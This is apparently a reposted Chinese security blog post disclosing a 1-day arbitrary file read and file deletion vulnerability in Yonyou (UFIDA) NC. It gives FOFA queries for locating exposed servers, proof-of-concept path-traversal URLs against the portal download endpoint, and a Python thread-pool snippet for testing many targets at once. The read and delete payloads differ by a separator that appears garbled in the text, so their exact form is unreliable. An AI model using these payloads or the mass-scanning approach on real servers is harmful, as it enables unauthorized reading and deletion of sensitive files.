用友NC的download文件存在任意文件读取和任意文件删除漏洞,攻击者可以利用该漏洞读取或删除服务器上的敏感文件。
资产
fofa:app="用友-UFIDA-NC"
fofa:title="YONYOU NC"
漏洞复现
任意文件读取:
POC:
/portal/pt/xml/file/download?pageId=login&filename=..index.jsp
任意文件删除:
/portal/pt/xml/file/download?pageId=login&filename=../index.jsp
区别在于""和"/"
直接拼接URL即可下载文件
批量测试:
通过线程池进行批量测试
with
concurrent.futures.ThreadPoolExecutor(max_workers=
8
)
as
executor:
executor.map(check_vulnerability, targets)
更改max_workers即可限制线程池数量
原文始发于微信公众号(知攻善防实验室):[1day]用友NC存在任意文件读取删除漏洞[附批量POC]
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论